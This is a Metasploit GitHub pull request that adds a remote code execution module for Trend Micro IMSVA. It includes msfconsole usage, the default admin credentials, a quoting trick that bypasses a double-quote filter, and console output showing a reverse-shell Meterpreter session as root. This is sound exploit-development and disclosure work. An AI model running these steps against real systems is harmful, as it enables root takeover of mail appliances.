Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Module Trend Micro IMSVA Remote Code Execution #7969

Merged
merged 2 commits into from Feb 21, 2017

Conversation

@mmetince
Copy link
Contributor

commented Feb 16, 2017

This module exploits a command injection vulnerability in the Trend Micro IMSVA product. An a uthenticated user can execute a terminal command under the context of the web server user which is root. Besides, default installationof IMSVA comes with a default administrator credentials.

All the details required for installation is located at .md file.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/trend_micro_imsva_exec
  • set RHOST 12.0.0.140
  • set LHOST 12.0.0.1
  • exploit
  • Verify the Meterpreter session 1 opened at console.

Console output:

msf > use exploit/linux/http/trend_micro_imsva_exec 
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Attempting to login with admin:imsva
[+] Authenticated as admin:imsva
[*] Delivering payload...
[*] Sending stage (38622 bytes) to 12.0.0.140
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.140:60822) at 2017-01-18 11:29:36 +0300

meterpreter > getuid
Server username: root
meterpreter >

Thanks

I would like to thanks @wvu-r7 who helps me to find out the work around for payload on IRC. Double quote was blacklisted at application layer so I need to find a way to pass payload to the following command without surrounding it double qoute python -c "PAYLOAD" .

The trick is we are using Single, Backslash, Single, Single on our payload. I know it's been a while since we discussed this case on IRC but vendor finally released a patch!

mmetince added 2 commits Jan 18, 2017

@wchen-r7 wchen-r7 self-assigned this Feb 16, 2017

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Feb 16, 2017

Testing this today. Thanks!

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Feb 17, 2017

My pleasure, @mmetince. Thank you for another great contribution!

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Feb 21, 2017

@mmetince I installed Trend Micro IMSVA, but there is no port 8445. Could you let me know how to set it up?

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Feb 21, 2017

@wchen-r7 which virtualisation application do you use ? If you're using vmware please do NOT choose easy install option.

Once you downloaded iso and started to installation, you must getting installation screen which really looks like centOS -it's actually customized centOS-.

There is a several things maybe important. Following steps are tested for Vmware Fusion.

  • Choose NAT mode for interface before starting a VM.
  • After you choose keyboard, timezone etc you must see a network configuration. Since you have set a NAT mode for interface, you need to set a IP address, netmask, gateway and DNS. Here is my configuration.

IP Address: 12.0.0.140 - I was sure it was empty and not reserved by dhcp-
Gateway: 12.0.0.2 - This is my default gateway ip for NAT network-
Netmask: 255.255.255.0
DNS: 8.8.8.8

You may get a warning that says DNS is out of your network but don't care keep moving.

Once installation completed, system will reboot and then you must see a following screen.

image

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Feb 21, 2017

Thanks for the instructions, and sorry for the long delay. The exploit works perfectly for me:

msf exploit(trend_micro_imsva_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Attempting to login with admin:imsva
[+] Authenticated as admin:imsva
[*] Delivering payload...
[*] Sending stage (38622 bytes) to 192.168.146.199
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.199:59710) at 2017-02-21 17:28:05 -0600

meterpreter > 

I will land it now. Thanks!

@wchen-r7 wchen-r7 merged commit 58c1f6f into rapid7:master Feb 21, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details
wchen-r7 added a commit that referenced this pull request Feb 21, 2017
@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Feb 21, 2017

Release Notes

The Module Trend Micro IMSVA Remote Code Execution has been added to the framework. It exploits a command injection vulnerability in Trend Micro IMSVA's HTTP service, which can result in remote code execution under the context of root.

@tdoan-r7 tdoan-r7 added the rn-exploit label Mar 6, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.